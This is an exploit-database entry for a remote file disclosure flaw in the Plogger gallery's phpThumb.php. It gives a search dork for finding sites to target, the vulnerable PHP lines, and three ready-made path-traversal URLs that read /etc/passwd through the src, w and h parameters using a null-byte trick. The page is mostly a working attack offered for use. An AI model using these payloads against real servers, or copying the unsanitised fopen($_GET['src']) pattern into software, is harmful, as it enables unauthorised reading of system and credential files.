[] NeoSense
E X P L O I T S
title author type platform port cve id

Plogger - Remote File Disclosure

Author: Mr.tro0oqy
type: webapps
platform: php
port: 
date_added: 2010-08-13 
date_updated: 2010-09-08 
verified: 0 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.complogger-1.0RC1.zip
# Plogger Remote File Disclosure Vulnerability
# http://www.plogger.org/
# dork : Powered by Plogger!
# author: Mr.tro0oqy (yemeni hacker)
# email : t.4@windowslive.com

exp :

Line 117:   if ($fp_source = @fopen($_GET['src'],'rb'))

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?src=../../../../../../../../etc/passwd%00

Line 41: 	$_GET['w'] = $matches[1];
Line 42: 	$_GET['h'] = $matches[2];

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?w=../../../../../../../../../etc/passwd%00

www.server.com/path/plog-includes/lib/phpthumb/phpThumb.php?h=../../../../../../../../../etc/passwd%00


greetz : all muslems (ramadan kreem)
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.